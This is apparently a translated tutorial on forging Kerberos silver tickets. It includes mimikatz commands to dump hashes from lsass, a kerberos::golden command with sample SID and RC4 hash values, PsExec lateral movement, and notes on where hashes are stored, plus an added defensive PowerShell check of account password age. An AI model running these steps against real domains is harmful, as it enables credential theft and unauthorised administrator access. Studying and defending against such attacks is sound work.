In the Kerberos article we built an initial understanding of how the Kerberos protocol works. The protocol solves two problems:
The first problem: how do I prove that you really are user XXX? This is the responsibility of the Authentication Server.
The second problem: how does the Server know that you are allowed to access the service it provides? When a Client accesses a service on a Server, how does the Server decide whether the Client has permission to access the service on its host? This is the responsibility of the Ticket Granting Server.
For the second problem the Kerberos protocol solves (how the Server knows you may access the service it provides), an attacker came up with an idea: forge the TGS ticket. So there is another attack against Kerberos authentication, forging the TGS ticket, known as the silver ticket.
A Silver Ticket is a forged TGS ticket. The forged TGS ticket contains a forged PAC; the PAC is what the server uses to obtain the corresponding user information, such as the user ID, and what the KDC uses to confirm whether the user has permission to access a service.
Because the silver ticket is a forged TGS ticket, it does not communicate with the domain controller at all in steps 1 to 4; it goes straight to step 5, where the TGS ticket is sent as part of the AP_REQ to the server providing the service in order to access that service.
Making a silver ticket (the screenshots from the golden ticket part have been cut; the tools used are mainly mimikatz and psexec)
Conditions for making a silver ticket:
1. The domain name
2. The SID (the domain SID value)
3. The password hash of the domain service account
4. A forged user name; any user name can be forged, usually administrator
5. The service to be accessed
Step one:
Run mimikatz with administrator rights
privilege::debug # elevate privileges
sekurlsa::logonpasswords # obtain the service account hash and the SID (the SID is the same within the same domain)
Step two:
Empty the local ticket cache
kerberos::purge # clear the local ticket cache
kerberos::list # view the tickets saved locally
Step three:
Forge the silver ticket and import it
kerberos::golden /domain:superman.com /sid:S-1-5-21-259090122-541454442-2960687606 /target:win08.superman.com /rc4:f6f19db774c63e49e9af61346adff204 /service:cifs /user:administrator /ptt
Step four:
Access the shared directory on the domain machine
dir \\win08\c$
Log in remotely and execute commands
PsExec.exe \\win08 cmd.exe
whoami # check the current privileges
The difference between golden tickets and silver tickets
1. A TGS ticket is for one service on one machine; a TGT is for all services on all machines.
2. A TGT uses the hash of the krbtgt account; a TGS ticket uses the hash of the service account (the hash of the target; the account is shown as the computer name followed by $).
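A defensive check that follows from this difference (added here as an example; it is not from the original post): a silver ticket stays valid for as long as the targeted service or computer account keeps its hash, and a golden ticket for as long as krbtgt keeps its hash, so the password age of those accounts is worth monitoring. It assumes the ActiveDirectory PowerShell module is available in a domain-joined session, a 30-day threshold for computer accounts (the default machine account password age) and a 180-day threshold for krbtgt (an assumed policy value).

```powershell
# Added example, not from the original post: report accounts whose Kerberos
# key material has not rotated recently. Assumes the ActiveDirectory module
# (RSAT) and a session that may read the domain.
Import-Module ActiveDirectory

# Assumption: 30 days matches the default machine account password age;
# 180 days for krbtgt is an assumed policy value.
$MaxComputerAgeDays = 30
$MaxKrbtgtAgeDays   = 180
$cutoff = (Get-Date).AddDays(-$MaxComputerAgeDays)

# Computer accounts (the "name$" service accounts a silver ticket is forged
# against) whose password is older than the threshold or was never set.
$staleComputers = Get-ADComputer -Filter * -Properties PasswordLastSet |
    Where-Object { $null -eq $_.PasswordLastSet -or $_.PasswordLastSet -lt $cutoff } |
    Select-Object Name, PasswordLastSet

"Computer accounts with a password older than $MaxComputerAgeDays days:"
$staleComputers | Format-Table -AutoSize

# krbtgt: the account whose hash a golden ticket is forged with.
$krbtgt = Get-ADUser -Identity krbtgt -Properties PasswordLastSet
$krbtgtAgeDays = ((Get-Date) - $krbtgt.PasswordLastSet).Days
"krbtgt password last set: $($krbtgt.PasswordLastSet) ($krbtgtAgeDays days ago)"
if ($krbtgtAgeDays -gt $MaxKrbtgtAgeDays) {
    "WARNING: krbtgt password is older than $MaxKrbtgtAgeDays days; a hash stolen that long ago still yields valid golden tickets."
}
```

Any account listed here is one whose stolen hash would still produce working tickets; rotating the password (twice for krbtgt, so both the current and previous keys change) invalidates tickets forged with the old hash.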
Result with a golden ticket:
We can log in as administrator on every machine inside the domain.
Result with a silver ticket:
Before adding the silver ticket for cifs, psexec could not be used; after adding it, psexec can log in as administrator.
Before adding it, psexesvc could not be moved onto the machine; after adding the silver ticket for cifs, dir can be used and the change in permissions can be seen.
Where the hashes are stored
While the system is running, hashes have to be grabbed from memory: the lsass.exe process holds the hashes of active (currently logged on) users. For an ordinary domain user or an ordinary workgroup machine: the SAM file (encrypted user passwords) and the SYSTEM file (the key); windows/system32/config/SAM stores the hashes of the users of the current machine.
Domain controller: ntds.dit holds the user names and password hashes of all domain users.